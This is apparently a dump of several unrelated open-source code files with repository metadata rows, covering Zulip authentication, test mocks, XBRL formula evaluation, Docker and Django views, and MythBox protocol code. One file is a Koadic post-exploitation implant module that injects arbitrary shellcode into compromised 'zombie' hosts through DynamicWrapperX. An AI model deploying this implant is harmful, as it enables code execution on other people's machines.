realm = Realm.objects.get(id=return_data["realm_id"])
multiuse_object_key = strategy.session_get('multiuse_object_key', '')
mobile_flow_otp = strategy.session_get('mobile_flow_otp')
# At this point, we have now confirmed that the user has
# demonstrated control over the target email address.
#
# The next step is to call login_or_register_remote_user, but
# there are two code paths here because of an optimization to save
# a redirect on mobile.
if mobile_flow_otp is not None:
# For mobile app authentication, login_or_register_remote_user
# will redirect to a special zulip:// URL that is handled by
# the app after a successful authentication; so we can
# redirect directly from here, saving a round trip over what
# we need to do to create session cookies on the right domain
# in the web login flow (below).
return login_or_register_remote_user(strategy.request, email_address,
user_profile, full_name,
mobile_flow_otp=mobile_flow_otp,
is_signup=is_signup,
redirect_to=redirect_to)
# If this authentication code were executing on
# subdomain.zulip.example.com, we would just call
# login_or_register_remote_user as in the mobile code path.
# However, because third-party SSO providers generally don't allow
# wildcard addresses in their redirect URLs, for multi-realm
# servers, we will have just completed authentication on e.g.
# auth.zulip.example.com (depending on
# settings.SOCIAL_AUTH_SUBDOMAIN), which cannot store cookies on
# the subdomain.zulip.example.com domain. So instead we serve a
# redirect (encoding the authentication result data in a
# cryptographically signed token) to a route on
# subdomain.zulip.example.com that will verify the signature and
# then call login_or_register_remote_user.
return redirect_and_log_into_subdomain(realm, full_name, email_address,
is_signup=is_signup,
redirect_to=redirect_to,
multiuse_object_key=multiuse_object_key)
class SocialAuthMixin(ZulipAuthMixin):
auth_backend_name = "undeclared"
# Used to determine how to order buttons on login form, backend with
# higher sort order are displayed first.
sort_order = 0
def auth_complete(self, *args: Any, **kwargs: Any) -> Optional[HttpResponse]:
"""This is a small wrapper around the core `auth_complete` method of
python-social-auth, designed primarily to prevent 500s for
exceptions in the social auth code from situations that are
really user errors. Returning `None` from this function will
redirect the browser to the login page.
"""
try:
# Call the auth_complete method of social_core.backends.oauth.BaseOAuth2
return super().auth_complete(*args, **kwargs) # type: ignore # monkey-patching
except AuthFailed as e:
# When a user's social authentication fails (e.g. because
# they did something funny with reloading in the middle of
# the flow), don't throw a 500, just send them back to the
# login page and record the event at the info log level.
logging.info(str(e))
return None
except SocialAuthBaseException as e:
# Other python-social-auth exceptions are likely
# interesting enough that we should log a warning.
logging.warning(str(e))
return None
class GitHubAuthBackend(SocialAuthMixin, GithubOAuth2):
auth_backend_name = "GitHub"
sort_order = 100
def get_verified_emails(self, *args: Any, **kwargs: Any) -> List[str]:
access_token = kwargs["response"]["access_token"]
try:
emails = self._user_data(access_token, '/emails')
except (HTTPError, ValueError, TypeError): # nocoverage
# We don't really need an explicit test for this code
# path, since the outcome will be the same as any other
# case without any verified emails
emails = []
verified_emails = [] # type: List[str]
for email_obj in self.filter_usable_emails(emails):
# social_associate_user_helper assumes that the first email in
# verified_emails is primary.
if email_obj.get("primary"):
verified_emails.insert(0, email_obj["email"])
else:
verified_emails.append(email_obj["email"])
return verified_emails
def filter_usable_emails(self, emails: List[Dict[str, Any]]) -> List[Dict[str, Any]]:
# We only let users login using email addresses that are verified
# by GitHub, because the whole point is for the user to
# demonstrate that they control the target email address. We also
# disallow the @noreply.github.com email addresses, because
# structurally, we only want to allow email addresses that can
# receive emails, and those cannot.
return [
email for email in emails
if email.get('verified') and not email["email"].endswith("@noreply.github.com")
]
def user_data(self, access_token: str, *args: Any, **kwargs: Any) -> Dict[str, str]:
"""This patched user_data function lets us combine together the 3
social auth backends into a single Zulip backend for GitHub Oauth2"""
team_id = settings.SOCIAL_AUTH_GITHUB_TEAM_ID
org_name = settings.SOCIAL_AUTH_GITHUB_ORG_NAME
if team_id is None and org_name is None:
# I believe this can't raise AuthFailed, so we don't try to catch it here.
return super().user_data(
access_token, *args, **kwargs
)
elif team_id is not None:
backend = GithubTeamOAuth2(self.strategy, self.redirect_uri)
try:
return backend.user_data(access_token, *args, **kwargs)
except AuthFailed:
return dict(auth_failed_reason="GitHub user is not member of required team")
elif org_name is not None:
backend = GithubOrganizationOAuth2(self.strategy, self.redirect_uri)
try:
return backend.user_data(access_token, *args, **kwargs)
except AuthFailed:
return dict(auth_failed_reason="GitHub user is not member of required organization")
raise AssertionError("Invalid configuration")
class AzureADAuthBackend(SocialAuthMixin, AzureADOAuth2):
sort_order = 50
auth_backend_name = "AzureAD"
AUTH_BACKEND_NAME_MAP = {
'Dev': DevAuthBackend,
'Email': EmailAuthBackend,
'Google': GoogleMobileOauth2Backend,
'LDAP': ZulipLDAPAuthBackend,
'RemoteUser': ZulipRemoteUserBackend,
} # type: Dict[str, Any]
OAUTH_BACKEND_NAMES = ["Google"] # type: List[str]
SOCIAL_AUTH_BACKENDS = [] # type: List[BaseOAuth2]
# Authomatically add all of our social auth backends to relevant data structures.
for social_auth_subclass in SocialAuthMixin.__subclasses__():
AUTH_BACKEND_NAME_MAP[social_auth_subclass.auth_backend_name] = social_auth_subclass
if issubclass(social_auth_subclass, BaseOAuth2):
OAUTH_BACKEND_NAMES.append(social_auth_subclass.auth_backend_name)
SOCIAL_AUTH_BACKENDS.append(social_auth_subclass)
| apache-2.0 | -2,213,531,157,359,025,700 | 46.083333 | 118 | 0.651349 | false |
NitishT/minio-py | tests/unit/minio_mocks.py | 1 | 2552 | # -*- coding: utf-8 -*-
# Minio Python Library for Amazon S3 Compatible Cloud Storage,
# (C) 2015,2016 Minio, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from minio.compat import _is_py3
from minio.fold_case_dict import FoldCaseDict
if _is_py3:
import http.client as httplib
else:
import httplib
from nose.tools import eq_
class MockResponse(object):
def __init__(self, method, url, headers, status_code, response_headers=None,
content=None):
self.method = method
self.url = url
self.request_headers = FoldCaseDict()
for header in headers:
self.request_headers[header] = headers[header]
self.status = status_code
self.headers = response_headers
self.data = content
if content is None:
self.reason = httplib.responses[status_code]
# noinspection PyUnusedLocal
def read(self, amt=1024):
return self.data
def mock_verify(self, method, url, headers):
eq_(self.method, method)
eq_(self.url, url)
for header in headers:
eq_(self.request_headers[header], headers[header])
# noinspection PyUnusedLocal
def stream(self, chunk_size=1, decode_unicode=False):
if self.data is not None:
return iter(bytearray(self.data, 'utf-8'))
return iter([])
# dummy release connection call.
def release_conn(self):
return
class MockConnection(object):
def __init__(self):
self.requests = []
def mock_add_request(self, request):
self.requests.append(request)
# noinspection PyUnusedLocal
def request(self, method, url, headers, redirect=False):
return_request = self.requests.pop(0)
return_request.mock_verify(method, url, headers)
return return_request
# noinspection PyRedeclaration,PyUnusedLocal,PyUnusedLocal
def urlopen(self, method, url, headers, preload_content=False, body=None,
redirect=False):
return self.request(method, url, headers)
| apache-2.0 | -269,605,990,221,122,240 | 32.142857 | 80 | 0.668887 | false |
foursquare/pants | tests/python/pants_test/pantsd/test_watchman_launcher.py | 1 | 2226 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import absolute_import, division, print_function, unicode_literals
import mock
from pants.pantsd.watchman import Watchman
from pants.pantsd.watchman_launcher import WatchmanLauncher
from pants_test.test_base import TestBase
class TestWatchmanLauncher(TestBase):
def watchman_launcher(self, cli_options=()):
bootstrap_options = self.get_bootstrap_options(cli_options)
return WatchmanLauncher.create(bootstrap_options)
def create_mock_watchman(self, is_alive):
mock_watchman = mock.create_autospec(Watchman, spec_set=False)
mock_watchman.ExecutionError = Watchman.ExecutionError
mock_watchman.is_alive.return_value = is_alive
return mock_watchman
def test_maybe_launch(self):
mock_watchman = self.create_mock_watchman(False)
wl = self.watchman_launcher()
wl.watchman = mock_watchman
self.assertTrue(wl.maybe_launch())
mock_watchman.is_alive.assert_called_once_with()
mock_watchman.launch.assert_called_once_with()
def test_maybe_launch_already_alive(self):
mock_watchman = self.create_mock_watchman(True)
wl = self.watchman_launcher()
wl.watchman = mock_watchman
self.assertTrue(wl.maybe_launch())
mock_watchman.is_alive.assert_called_once_with()
self.assertFalse(mock_watchman.launch.called)
def test_maybe_launch_error(self):
mock_watchman = self.create_mock_watchman(False)
mock_watchman.launch.side_effect = Watchman.ExecutionError('oops!')
wl = self.watchman_launcher()
wl.watchman = mock_watchman
with self.assertRaises(wl.watchman.ExecutionError):
wl.maybe_launch()
mock_watchman.is_alive.assert_called_once_with()
mock_watchman.launch.assert_called_once_with()
def test_watchman_property(self):
wl = self.watchman_launcher()
self.assertIsInstance(wl.watchman, Watchman)
def test_watchman_socket_path(self):
expected_path = '/a/shorter/path'
options = ['--watchman-socket-path={}'.format(expected_path)]
wl = self.watchman_launcher(options)
self.assertEquals(wl.watchman._sock_file, expected_path)
| apache-2.0 | 4,364,870,295,606,738,400 | 33.246154 | 82 | 0.738095 | false |
sternshus/arelle2.7 | svr-2.7/arelle/plugin/cdrFormula/cdrContext.py | 1 | 19169 | '''
cdrContext provides the validation and execution context for CDR Formula language expressions.
(c) Copyright 2013 Mark V Systems Limited, California US, All rights reserved.
'''
from collections import OrderedDict
from .cdrParser import astNode
from arelle.ModelFormulaObject import aspectModels, Aspect, aspectStr
from arelle.ModelInstanceObject import ModelFact, ModelDimensionValue
from arelle.FormulaEvaluator import implicitFilter, aspectsMatch
from arelle.ModelValue import QName
from arelle.ModelXbrl import DEFAULT, NONDEFAULT
from arelle import XmlUtil
class CdrContext:
def __init__(self, cdrFormulas, orderedFormulaQnames, modelXbrl=None):
self.modelXbrl = modelXbrl # the DTS and input instance (if any)
self.cdrFormulas = cdrFormulas
self.orderedFormulaQnames = orderedFormulaQnames
self.hyperspaceBindings = None
if modelXbrl is not None:
self.formulaOptions = modelXbrl.modelManager.formulaOptions
self.defaultDimensionAspects = set(modelXbrl.qnameDimensionDefaults.keys())
def close(self):
# dereference grammar
for modelFormula in self.cdrFormulas.items():
for node in modelFormula.prog:
if isinstance(node, astNode):
node.clear()
modelFormula.prog.clear()
self.__dict__.clear() # delete local attributes
class EvaluationBindings:
def __init__(self, cdrContext):
self.sCtx = cdrContext
self.parentHyperspaceBindings = cdrContext.evaluationBindings
cdrContext.evaluationBindings = self
self.evaluationBindings = []
self.nodeBindings = {}
self.withRestrictionBindings = []
self.aspectBoundFacts = {}
self.aggregationNode = None
self.isValuesIteration = False
def close(self):
if self.sCtx.evaluationBindings is self:
self.sCtx.evaluationBindings = self.parentEvaluationBindings
for binding in self.evaluationBindings:
binding.close()
self.__dict__.clear() # dereference
def nodeBinding(self, node, isWithRestrictionNode=False):
if node in self.nodeBindings:
return self.nodeBindings[node]
if self.aggregationNode and self.aggregationNode not in self.nodeBindings and not self.isValuesIteration:
agrgBalNode = EvaluationBinding(self, node, isBalancingBinding=True)
self.nodeBindings[self.aggregationNode] = agrgBalNode
nodeBinding = EvaluationBinding(self, node, isWithRestrictionNode=isWithRestrictionNode)
self.nodeBindings[node] = nodeBinding
self.evaluationBindings.append(nodeBinding)
return nodeBinding
def forBinding(self, node):
if node in self.nodeBindings:
return self.nodeBindings[node]
nodeBinding = ForBinding(self, node)
self.nodeBindings[node] = nodeBinding
self.evaluationBindings.append(nodeBinding)
return nodeBinding
def next(self, iterateAbove=-1, bindingsLen=-1):
# iterate evaluation bindings
if not self.evaluationBindings:
raise StopIteration
evaluationBindingsToReset = []
if bindingsLen == -1:
bindingsLen = len(self.evaluationBindings)
for iB in range(bindingsLen - 1, iterateAbove, -1):
evalBinding = self.evaluationBindings[iB]
try:
evalBinding.next()
for evalBinding in evaluationBindingsToReset:
evalBinding.reset()
return # hsB has another value to return
except StopIteration:
evaluationBindingsToReset.insert(0, evalBinding) # reset after outer iterator advanced
raise StopIteration # no more outermost loop of iteration
@property
def boundFacts(self):
return [binding.yieldedFact
for binding in self.evaluationBindings
if isinstance(binding, EvaluationBinding) and
not binding.fallenBack and binding.yieldedFact is not None]
class EvaluationBinding:
def __init__(self, evaluationBindings, node, fallback=False, isWithRestrictionNode=False, isBalancingBinding=False):
self.evaluationBindings = evaluationBindings
self.sCtx = evaluationBindings.sCtx
self.node = node
self.isWithRestrictionNode = isWithRestrictionNode
self.isBalancingBinding = isBalancingBinding
self.isValuesIteration = evaluationBindings.isValuesIteration
self.fallback = fallback
self.aspectsQualified = set()
self.aspectsDefined = set(aspectModels["dimensional"])
if evaluationBindings.withRestrictionBindings:
withAspectsQualified = evaluationBindings.withRestrictionBindings[-1].aspectsQualified
else:
withAspectsQualified = set()
# axes from macros need to be expanded
self.aspectAxisTuples = []
self.axesAspects = set()
for hsAxis in node.axes:
if hsAxis.aspect: # no aspect if just a where clause
aspect = evaluate(hsAxis.aspect, self.sCtx, value=True)
if aspect not in self.aspectsDefined and not isinstance(aspect, QName):
raise CdrException(node, "cdr:aspectValue",
_("Evaluation aspect indeterminate %(aspect)s"),
aspect=aspect)
if isinstance(aspect, QName):
if aspect not in self.sCtx.dimensionIsExplicit: # probably dynamic macro aspect
concept = self.sCtx.modelXbrl.qnameConcepts.get(aspect)
if concept is None or not concept.isDimensionItem:
raise CdrException(node, "cdrBinding:axisNotDimension",
_("Axis aspect is not a dimension in the DTS %(aspect)s"),
aspect=aspect)
self.sCtx.dimensionIsExplicit[aspect] = concept.isExplicitDimension
self.axesAspects.add(aspect) # resolved aspect value
self.aspectAxisTuples.append( (aspect, hsAxis) )
self.aspectsQualified = self.axesAspects | withAspectsQualified
self.reset() # will raise StopIteration if no facts or fallback
def close(self):
self.__dict__.clear() # dereference
@property
def value(self):
if self.fallenBack:
return None
if self.yieldedFact is not None:
return self.yieldedFact.xValue
return None
@property
def var(self): # used in implicitFilter winnowing trace
return []
@property
def qname(self): # used in implicitFilter winnowing trace
return ''
def __repr__(self):
if self.fallenBack:
return "fallen-back"
if self.yieldedFact is not None:
return self.yieldedFact.__repr__()
return "none"
def reset(self):
# start with all facts
if self.evaluationBindings.withRestrictionBindings:
facts = self.evaluationBindings.withRestrictionBindings[-1].yieldedFactsPartition
else:
facts = self.sCtx.modelXbrl.nonNilFactsInInstance
if self.sCtx.formulaOptions.traceVariableFilterWinnowing:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s binding: start with %(factCount)s facts"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), factCount=len(facts))
# filter by binding aspects
facts = self.filterFacts(facts)
for fact in facts:
if fact.isItem:
self.aspectsDefined |= fact.context.dimAspects(self.sCtx.defaultDimensionAspects)
self.unQualifiedAspects = self.aspectsDefined - self.aspectsQualified - {Aspect.DIMENSIONS}
# implicitly filter by prior uncoveredAspectFacts
if self.hyperspaceBindings.aspectBoundFacts and not self.isValuesIteration:
facts = implicitFilter(self.sCtx, self, facts, self.unQualifiedAspects, self.hyperspaceBindings.aspectBoundFacts)
if self.sCtx.formulaOptions.traceVariableFiltersResult:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s binding: filters result %(factCount)s facts"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), factCount=len(facts))
if self.isWithRestrictionNode: # if withNode, combine facts into partitions by qualified aspects
factsPartitions = []
for fact in facts:
matched = False
for partition in factsPartitions:
if aspectsMatch(self.sCtx, fact, partition[0], self.aspectsQualified):
partition.append(fact)
matched = True
break
if not matched:
factsPartitions.append([fact,])
self.factIter = iter([set(p) for p in factsPartitions]) # must be sets
self.yieldedFactsPartition = []
else: # just a hyperspaceExpression node
self.factIter = iter(facts)
self.yieldedFact = None
self.fallenBack = False
self.next()
def next(self): # will raise StopIteration if no (more) facts or fallback
uncoveredAspectFacts = self.evaluationBindings.aspectBoundFacts
if self.yieldedFact is not None and self.evaluationBindings.aggregationNode is None:
for aspect, priorFact in self.evaluationContributedUncoveredAspects.items():
if priorFact == "none":
del uncoveredAspectFacts[aspect]
else:
uncoveredAspectFacts[aspect] = priorFact
self.evaluationContributedUncoveredAspects.clear()
try:
if self.isWithRestrictionNode:
self.yieldedFactsPartition = next(self.factIter)
for self.yieldedFact in self.yieldedFactsPartition:
break
else:
self.yieldedFact = next(self.factIter)
self.evaluationContributedUncoveredAspects = {}
if not self.isValuesIteration:
for aspect in self.unQualifiedAspects: # covered aspects may not be defined e.g., test 12062 v11, undefined aspect is a complemented aspect
if uncoveredAspectFacts.get(aspect) is None:
self.evaluationContributedUncoveredAspects[aspect] = uncoveredAspectFacts.get(aspect,"none")
uncoveredAspectFacts[aspect] = None if aspect in self.axesAspects else self.yieldedFact
if self.sCtx.formulaOptions.traceVariableFiltersResult:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s: bound value %(result)s"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), result=str(self.yieldedFact))
except StopIteration:
self.yieldedFact = None
if self.isWithRestrictionNode:
self.yieldedFactsPartition = []
if self.fallback and not self.fallenBack:
self.fallenBack = True
if self.sCtx.formulaOptions.traceVariableExpressionResult:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s: fallbackValue result %(result)s"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), result=0)
else:
raise StopIteration
def filterFacts(self, facts):
modelXbrl = self.sCtx.modelXbrl
# process with bindings and this node
for i, aspectAxis in enumerate(self.aspectAxisTuples):
aspect, hsAxis = aspectAxis
# value is an astHyperspaceAxis
if hsAxis.restriction:
restriction = evaluate(hsAxis.restriction, self.sCtx, value=True)
if aspect == Aspect.CONCEPT:
aspectQualifiedFacts = [modelXbrl.factsByQname[qn]
for qn in restriction
if isinstance(qn, QName)]
facts = facts & set.union(*aspectQualifiedFacts) if aspectQualifiedFacts else set()
elif aspect == Aspect.PERIOD:
facts = set(f for f in facts if isPeriodEqualTo(f, restriction))
elif aspect == Aspect.ENTITY_IDENTIFIER:
facts = set(f for f in facts if isEntityIdentifierEqualTo(f, restriction))
elif isinstance(aspect, QName):
if self.sCtx.dimensionIsExplicit.get(aspect):
# explicit dim facts (value None will match the default member)
aspectQualifiedFacts = []
for qn in restriction:
if self.isBalancingBinding: # complement dimension for aggregation balancing binding
if isinstance(qn, QName) or qn is NONDEFAULT:
qn = DEFAULT
else:
qn = NONDEFAULT
if qn is NONE:
qn = DEFAULT
elif not (isinstance(qn, QName) or qn is DEFAULT or qn is NONDEFAULT):
continue
aspectQualifiedFacts.append(modelXbrl.factsByDimMemQname(aspect, qn))
facts = facts & set.union(*aspectQualifiedFacts) if aspectQualifiedFacts else set()
else:
facts = facts & set(fact
for fact in facts
for typedDimValue in hsAxis.restriction
if typedDimTest(aspect, typedDimValue, fact))
if hsAxis.whereExpr and facts: # process where against facts passing restriction
whereMatchedFacts = set()
asVars = set()
for fact in facts:
for asAspectAxis in self.aspectAxisTuples[0:i+1]:
asAspect, asHsAxis = asAspectAxis
if asHsAxis.asVariableName:
self.sCtx.localVariables[asHsAxis.asVariableName] = factAspectValue(fact, asAspect)
asVars.add(asHsAxis.asVariableName)
self.sCtx.localVariables["item"] = fact
if evaluate(hsAxis.whereExpr, self.sCtx) ^ self.isBalancingBinding:
whereMatchedFacts.add(fact)
del self.sCtx.localVariables["item"]
for asVar in asVars:
del self.sCtx.localVariables[asVar]
facts = whereMatchedFacts
if self.sCtx.formulaOptions.traceVariableFilterWinnowing:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s: %(filter)s filter passes %(factCount)s facts"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), filter=aspectStr(aspect), factCount=len(facts))
if self.node.isClosed: # winnow out non-qualified dimension breakdowns
facts = facts - set(fact
for fact in facts
if fact.dimAspects - self.aspectsQualified )
if self.sCtx.formulaOptions.traceVariableFilterWinnowing:
self.sCtx.modelXbrl.info("cdr:trace",
_("Evaluation %(variable)s: closed selection filter passes %(factCount)s facts"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node), factCount=len(facts))
return facts
def isPeriodEqualTo(fact, periodRestriction):
context = fact.context
if context is not None:
for period in periodRestriction:
if ((context.isInstantPeriod and context.instantDatetime == period) or
(context.isStartEndPeriod and (context.startDatetime, context.endDatetime) == period) or
(context.isForeverPeriod and period == (None, None))):
return True
return False
def isEntityIdentifierEqualTo(fact, entityIdentifierRestriction):
context = fact.context
if context is not None:
for entityIdentifier in entityIdentifierRestriction:
if context.entityIdentifier == entityIdentifier:
return True
return False
def typedDimTest(aspect, value, fact):
if fact.context is None:
return False
modelDim = fact.context.dimValue(aspect)
if isinstance(modelDim, ModelDimensionValue):
memElt = modelDim.typedMember
if memElt is None or memElt.get("{http://www.w3.org/2001/XMLSchema-instance}nil") == "true":
return value is NONE or value is DEFAULT
if value is NONDEFAULT:
return True
return memElt.textValue == value
else:
return value is NONE or value is DEFAULT
class ForBinding:
def __init__(self, hyperspaceBindings, node):
self.hyperspaceBindings = hyperspaceBindings
self.sCtx = hyperspaceBindings.sCtx
self.node = node
self.collection = evaluate(node.collectionExpr, self.sCtx)
self.reset() # will raise StopIteration if no for items
def close(self):
self.__dict__.clear() # dereference
@property
def value(self):
if self.yieldedValue is not None:
return self.yieldedValue
return None
def __repr__(self):
if self.yieldedValue is not None:
return self.yieldedValue.__repr__()
return "none"
def reset(self):
self.forIter = iter(self.collection)
self.yieldedValue = None
self.next()
def next(self): # will raise StopIteration if no (more) facts or fallback
try:
self.yieldedValue = next(self.forIter)
# set next value here as well as in for node, because may be cleared above context of for node
self.sCtx.localVariables[self.node.name] = self.yieldedValue
if self.sCtx.formulaOptions.traceVariableFiltersResult:
self.sCtx.modelXbrl.info("sphinx:trace",
_("For loop %(variable)s: bound value %(result)s"),
sourceFileLine=self.node.sourceFileLine, variable=str(self.node.name), result=str(self.yieldedValue))
except StopIteration:
if self.yieldedValue is not None:
del self.sCtx.localVariables[self.node.name]
self.yieldedValue = None
raise StopIteration
from .cdrEvaluator import evaluate, factAspectValue, CdrException, NONE
| apache-2.0 | -6,810,582,852,387,637,000 | 48.5323 | 156 | 0.608952 | false |
zerosum0x0/koadic | modules/implant/inject/shellcode_dynwrapx.py | 1 | 2827 | import core.implant
import core.job
import string
import uuid
class DynWrapXShellcodeJob(core.job.Job):
def create(self):
self.fork32Bit = True
self.options.set("DLLUUID", uuid.uuid4().hex)
self.options.set("MANIFESTUUID", uuid.uuid4().hex)
self.options.set("SHELLCODEDECCSV", self.convert_shellcode(shellcode))
self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"'))
def report(self, handler, data, sanitize = False):
task = handler.get_header(self.options.get("UUIDHEADER"), False)
if task == self.options.get("DLLUUID"):
handler.send_file(self.options.get("DYNWRAPXDLL"))
return
if task == self.options.get("MANIFESTUUID"):
handler.send_file(self.options.get("DYNWRAPXMANIFEST"))
return
super(DynWrapXShellcodeJob, self).report(handler, data)
def done(self):
self.results = "Cpmpleted"
self.display()
def display(self):
pass
#self.shell.print_plain(str(self.errno))
class DynWrapXShellcodeImplant(core.implant.Implant):
NAME = "Shellcode via Dynamic Wrapper X"
DESCRIPTION = "Executes arbitrary shellcode using the Dynamic Wrapper X COM object"
AUTHORS = ["zerosum0x0"]
STATE = "implant/inject/shellcode_dynwrapx"
def load(self):
self.options.register("DIRECTORY", "%TEMP%", "writeable directory on zombie", required=False)
self.options.register("SHELLCODE", "90c3", "in ASCII hex format (e.g.: 31c0c3)", required=True)
self.options.register("SHELLCODEDECCSV", "", "decimal CSV shellcode", hidden=True)
self.options.register("DYNWRAPXDLL", "data/bin/dynwrapx.dll", "relative path to dynwrapx.dll", required=True, advanced=True)
self.options.register("DYNWRAPXMANIFEST", "data/bin/dynwrapx.manifest", "relative path to dynwrapx.manifest", required=True, advanced=True)
self.options.register("UUIDHEADER", "ETag", "HTTP header for UUID", advanced=True)
self.options.register("DLLUUID", "ETag", "HTTP header for UUID", hidden=True)
self.options.register("MANIFESTUUID", "ETag", "HTTP header for UUID", hidden=True)
def job(self):
return DynWrapXShellcodeJob
def run(self):
shellcode = self.options.get("SHELLCODE")
if not self.validate_shellcode(shellcode):
self.shell.print_error("SHELLCODE option is an invalid hex string.")
return
#vba = self.loader.load_script("data/implant/inject/shellcode.vba", self.options)
#vba = vba.decode().replace("\n", "\\n")
#self.options.set("VBACODE", vba)
workloads = {}
workloads["js"] = "data/implant/inject/shellcode_dynwrapx.js"
self.dispatch(workloads, self.job)
| apache-2.0 | 7,122,812,421,590,287,000 | 37.202703 | 147 | 0.655111 | false |
pavlovicv/iorem | config/urls.py | 1 | 1275 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views.generic import TemplateView
from django.views import defaults as default_views
urlpatterns = [
url(r'^$', TemplateView.as_view(template_name='pages/home.html'), name="home"),
url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name="about"),
# Django Admin, use {% url 'admin:index' %}
url(settings.ADMIN_URL, include(admin.site.urls)),
# User management
url(r'^users/', include("iorem.users.urls", namespace="users")),
url(r'^accounts/', include('allauth.urls')),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these url in browser to see how these error pages look like.
urlpatterns += [
url(r'^400/$', default_views.bad_request),
url(r'^403/$', default_views.permission_denied),
url(r'^404/$', default_views.page_not_found),
url(r'^500/$', default_views.server_error),
]
| bsd-3-clause | 1,826,147,253,955,634,000 | 35.428571 | 91 | 0.687059 | false |
0mu-Project/Gensokyo-Server-Platform | Yakumo/Yakumo-Instance/muMDAU_app/docker.py | 1 | 2456 | # -*- coding: utf-8 -*-
# muMDAU_app main / first page
from muMDAU_app import app, socketio
from threading import Thread
from flask import render_template, url_for, redirect, session, request
from docker import Client
pullthread = None
# index page main route page
@app.route('/project')
def pview():
return render_template('project.html')
@app.route('/docker')
def dockerview():
if 'username' in session:
cli = Client(base_url='tcp://'+ session['username'] +'.docker:14438')
c = cli.containers(all=True)
images = cli.images()
return render_template('docker.html', **locals())
else:
return redirect(url_for('main.index'))
@app.route('/docker/run')
def run():
if 'username' in session:
clir = Client(base_url='tcp://'+ session['username'] +'.docker:14438')
clirt = clir.create_container(tty=True, detach=True, image='0muproject/0mu-flask', name='0mu-Flask-06', ports=['8510', '22'], host_config=clir.create_host_config(port_bindings={8510: 8510, 22: 2222}))
clir.start(clirt.get('Id'))
return redirect(url_for('dockerview'))
else:
return redirect(url_for('main.index'))
@app.route('/docker/stop/<Name>')
def dockerstop(Name):
if 'username' in session:
cli = Client(base_url='tcp://172.17.0.2:14458')
cli.stop(container=Name)
return redirect(url_for('dockerview'))
else:
return redirect(url_for('main.index'))
@app.route('/docker/start/<Name>')
def dockerstart(Name):
if 'username' in session:
return redirect(url_for('dockerview'))
else:
return redirect(url_for('main.index'))
@app.route('/docker/pull/<Name>', methods=['GET', 'POST'])
def dockerpull(Name):
if request.method == 'POST':
global pullthread
if 'username' in session:
pullthread = Thread(target=pull_connect(Name))
pullthread.daemon = True
pullthread.start()
return '開始進行Pull'
else:
return redirect(url_for('main.index'))
def pull_connect(Name):
cli = Client(base_url='tcp://172.17.0.2:14458')
for line in cli.pull(Name, stream=True):
socketio.emit('pull', {'info': eval(line.decode('utf-8')).get('status') + '</br>' +str(eval(line.decode('utf-8')).get('progress',''))}, namespace='/pull/info')
socketio.emit('pull', {'info': "[Pull-Done] 請重新整理 Hakurei-Docker 界面"}, namespace='/pull/info')
| gpl-3.0 | 3,742,627,619,181,106,700 | 35.878788 | 208 | 0.628595 | false |
bast/gitink | gitink/color.py | 1 | 1192 | def whiter_shade_of_pale(hex_color):
'''
This function pales the color a bit for the interior
of the boxes.
'''
pale_shift = 70
# separate the red, green, blue parts
r_hex = hex_color[1:3]
g_hex = hex_color[3:5]
b_hex = hex_color[5:7]
# convert from hex to dec
r_dec = int(r_hex, 16)
g_dec = int(g_hex, 16)
b_dec = int(b_hex, 16)
# make the color paler but make sure we do not go
# beyond 255 or ff
r_dec = min(255, r_dec + pale_shift)
g_dec = min(255, g_dec + pale_shift)
b_dec = min(255, b_dec + pale_shift)
# convert from dec to hex
r_hex = format(r_dec, '02x')
g_hex = format(g_dec, '02x')
b_hex = format(b_dec, '02x')
# stitch them again together
return '#{0}{1}{2}'.format(r_hex, g_hex, b_hex)
def get_color(text):
# this is the deep palette of https://seaborn.pydata.org/
palette = ['#4C72B0',
'#55A868',
'#C44E52',
'#8172B2',
'#CCB974',
'#64B5CD']
position = ord(text[0]) % len(palette)
color = palette[position]
pale_color = whiter_shade_of_pale(color)
return color, pale_color
| mpl-2.0 | 8,822,537,647,600,122,000 | 24.361702 | 61 | 0.551174 | false |
analogue/mythbox | resources/src/mythbox/mythtv/protocol.py | 1 | 13858 | #
# MythBox for XBMC - http://mythbox.googlecode.com
# Copyright (C) 2012 [email protected]
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
from mythbox.mythtv.enums import TVState, TVState44, TVState58
# MythTV Protcol Constants
initVersion = 8
initToken = ''
separator = u'[]:[]'
serverVersion = None
class ProtocolException(Exception):
'''
Thrown on protcol version mismatch between frontend and backend or
general protocol related errors.
'''
pass
class BaseProtocol(object):
def recordSize(self):
return len(self.recordFields())
